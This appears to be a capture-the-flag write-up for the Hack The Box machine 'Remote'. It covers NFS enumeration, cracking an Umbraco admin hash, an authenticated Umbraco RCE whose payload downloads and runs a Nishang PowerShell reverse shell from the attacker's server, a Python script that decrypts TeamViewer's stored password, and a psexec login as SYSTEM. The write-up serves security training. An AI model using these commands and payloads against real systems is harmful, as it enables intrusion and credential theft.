Remote

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.180 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Mar 17 20:30:07 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.31s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
49666/tcp open  unknown

# Nmap done at Thu Mar 17 20:30:34 2022 -- 1 IP address (1 host up) scanned in 26.91 seconds

As we see, there quite a few ports are open. Let's try to obtain more information about the services and versions running on those ports.

nmap -sC -sV -p21,80,111,135,445,2049,49666 10.10.10.180 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Mar 17 20:34:10 2022 as: nmap -sCV -p21,80,111,135,445,2049,49666 -Pn -oN targeted 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.046s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-03-17T19:35:10
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 17 20:36:19 2022 -- 1 IP address (1 host up) scanned in 128.70 seconds

Let's take a look at the website.

Not much going on. Let's enumerate directories with gobuster.

gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.180
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404,500
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/18 15:30:01 Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 200) [Size: 5001]
/products             (Status: 200) [Size: 5328]
/contact              (Status: 200) [Size: 7880]
/home                 (Status: 200) [Size: 6703]
/people               (Status: 200) [Size: 6739]
/Home                 (Status: 200) [Size: 6703]
/Products             (Status: 200) [Size: 5338]
/Contact              (Status: 200) [Size: 7890]
/install              (Status: 302) [Size: 126] [--> /umbraco/]
/Blog                 (Status: 200) [Size: 5011]               
/about-us             (Status: 200) [Size: 5451]               
/People               (Status: 200) [Size: 6749]               
/INSTALL              (Status: 302) [Size: 126]

===============================================================
2022/03/18 15:33:47 Finished
===============================================================

If we take at look a the /install directory, which redirects to the /umbraco/ directory, we'll see a login page.

If we search for common umbraco exploits with the searchsploit tool, we'll see that there is one which allow us to execute commands remotely, but we need some valid credentials to use it.

searchsploit umbraco

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                                   | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                            | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                            | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal                                                                                               | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                            | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF                                                                                                      | aspx/webapps/50462.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

Nmap reported that port 2049 is open. This is the default port for NFS (Network File System). Let's try to see if there is any mount available.

showmount -e 10.10.10.180

• -e show the NFS server's export list.

Export list for 10.10.10.180:
/site_backups (everyone)

Let's create a directory in which we'll be mounting the NFS.

mkdir nfs

Now, let's mount the NFS into the previous folder.

mount -t nfs 10.10.10.180:/site_backups nfs/

• -t limit the set of filesystem types.

If we take a look at the nfs folder, we'll see a bunch of directories related to the web page.

ls -ll nfs/

total 115
drwx------ 2 nobody 4294967294    64 Feb 20  2020 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Data
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Plugins
drwx------ 2 nobody 4294967294    64 Feb 20  2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20  2020 bin
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Config
drwx------ 2 nobody 4294967294    64 Feb 20  2020 css
-rwx------ 1 nobody 4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 nobody 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Media
drwx------ 2 nobody 4294967294    64 Feb 20  2020 scripts
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20  2020 Web.config

If you inspect the nfs/ folder, we'll end up finding the umbraco.sfd file inside the App_Data folder.

ls -ll nfs/App_Data

total 1969
drwx------ 2 nobody 4294967294      64 Feb 20  2020 cache
drwx------ 2 nobody 4294967294    4096 Feb 20  2020 Logs
drwx------ 2 nobody 4294967294    4096 Feb 20  2020 Models
drwx------ 2 nobody 4294967294      64 Feb 20  2020 packages
drwx------ 2 nobody 4294967294    4096 Feb 20  2020 TEMP
-rwx------ 1 nobody 4294967294   36832 Feb 20  2020 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20  2020 Umbraco.sdf

We can see that it is a binary file.

cat nfs/App_Data/Umbraco.sdf

File: nfs/App_Data/Umbraco.sdf   <BINARY>

If we search for admin in the file with the strings tool, we'll find an email and a password hash.

strings nfs/App_Data/Umbraco.sdf | grep admin

[...]
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
[...]

Let's see if we can get the password for that hash with crackstation.

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.

https://crackstation.net/

And we get the baconandcheese password. Now that we've got some valid credentials, we can use the exploit we found earlier with searchsploit.

searchsploit -m aspx/webapps/46153.py

  Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46153
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable

Copied to: /home/alfa8sa/HTB/machines/remote/46153.py

Before executing it, we'll have to change a few things. First we'll have to change the login variable to admin@htb.local, the password variable to baconandcheese, and the host variable to http://10.10.10.180.

nano 46153.py

login = "adminadmin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

Then we'll have to change the payload variable, so it will send us back a reverse shell. But first, we'll have to copy the Invoke-PowerShellTcp.ps1 file from Nishang to our current directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1

And then open it and paste the following line at the end of the file.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 4444

And then set an HTTP server on the current directory with python.

python -m http.server 80

Then, back to the python script, in the payload variable, we'll have to change it, so it will download and import the rev.ps1 file, and when it is executed, it will send us the reverse shell.

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c powershell IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.19/rev.ps1\'); System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

Finally, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Now, if we execute the python script, we should get a reverse shell as the iis apppool\defaultapppool user, and we cloud grab the user flag.

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.180] 49703
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
iis apppool\defaultapppool
type \users\public\user.txt
6d0c411c9accbbe995751f83645e54d1

Privilege Escalation

If we list the processes running on the local machine, we'll see that TeamViewer is being executed.

tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        140 K
Registry                        88                            0     20,108 K
smss.exe                       292                            0      1,244 K
csrss.exe                      372                            0      5,208 K
wininit.exe                    480                            0      6,856 K
csrss.exe                      496                            1      4,712 K
winlogon.exe                   544                            1     16,440 K
services.exe                   612                            0      7,880 K
lsass.exe                      632                            0     13,672 K
svchost.exe                    732                            0     13,660 K
fontdrvhost.exe                752                            0      3,908 K
fontdrvhost.exe                760                            1      4,200 K
svchost.exe                    844                            0      9,896 K
dwm.exe                        936                            1     37,272 K
svchost.exe                    972                            0     59,996 K
svchost.exe                    312                            0     15,084 K
svchost.exe                    316                            0     17,164 K
svchost.exe                    364                            0     16,912 K
svchost.exe                   1036                            0     19,164 K
svchost.exe                   1120                            0     22,272 K
vm3dservice.exe               1236                            0      6,548 K
svchost.exe                   1440                            0      8,696 K
svchost.exe                   1580                            0     16,796 K
spoolsv.exe                   1596                            0     16,248 K
svchost.exe                   1804                            0     10,652 K
svchost.exe                   2060                            0     26,804 K
svchost.exe                   2080                            0     11,784 K
inetinfo.exe                  2104                            0     15,192 K
svchost.exe                   2164                            0      8,288 K
TeamViewer_Service.exe        2228                            0     19,268 K
VGAuthService.exe             2256                            0     10,548 K
vmtoolsd.exe                  2280                            0     17,692 K
svchost.exe                   2296                            0      7,372 K
svchost.exe                   2312                            0     12,276 K
MsMpEng.exe                   2404                            0    170,252 K
nfssvc.exe                    2412                            0      5,264 K
svchost.exe                   2536                            0     12,124 K
dllhost.exe                   3132                            0     13,384 K
WmiPrvSE.exe                  3264                            0     18,532 K
LogonUI.exe                   3468                            1     45,868 K
msdtc.exe                     3536                            0     10,156 K
SearchIndexer.exe             4204                            0     18,212 K
svchost.exe                    776                            0     12,864 K
w3wp.exe                      1372                            0    298,748 K
svchost.exe                   4992                            0      6,204 K
cmd.exe                        472                            0      3,712 K
conhost.exe                   2132                            0     12,272 K
powershell.exe                4084                            0    126,344 K
tasklist.exe                  2684                            0      7,588 K

If we check on the C:\Program Files (x86)\TeamViewer directory, we'll see that it is using version 7.

dir \progra~2\TeamViewer

    Directory: C:\Program Files (x86)\TeamViewer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/27/2020  10:35 AM                Version7

There is a Metasploit script coded in ruby, which can break the TeamViewer passwords. All we need is the password hash, and we can find it in the HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7 registry. This registry has the SecurityPasswordAES property which contains the password hash.

(Get-ItemProperty HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7).SecurityPasswordAES

255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

As I don't like to use Metasploit, I made a python script which breaks this hash and give us the password.

from Crypto.Cipher import AES

key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"

decipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218, 126, 141, 55, 107, 38, 57, 78, 91])

plaintext = decipher.decrypt(ciphertext).decode()

print(plaintext)

If we execute it, we'll get the !R3m0te! password.

python passwd.py

!R3m0te!

Now we can check with crackmapexec if it is the administrator password.

crackmapexec smb 10.10.10.180 -u 'Administrator' -p "\!R3m0te\!"

SMB         10.10.10.180    445    REMOTE           [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB         10.10.10.180    445    REMOTE           [+] remote\Administrator:!R3m0te! (Pwn3d!)

And we can verify that the password is valid. Finally, let's get a shell as the nt authority\system user with psexec. Then, all we have to do is reap the harvest and take the root flag.

impacket-psexec Administrator:"\!R3m0te\!"@10.10.10.180

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file SliGWDPW.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service gnjn on 10.10.10.180.....
[*] Starting service gnjn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \users\administrator\desktop\root.txt
f5f08ce4e749219167bb2e08abe2283b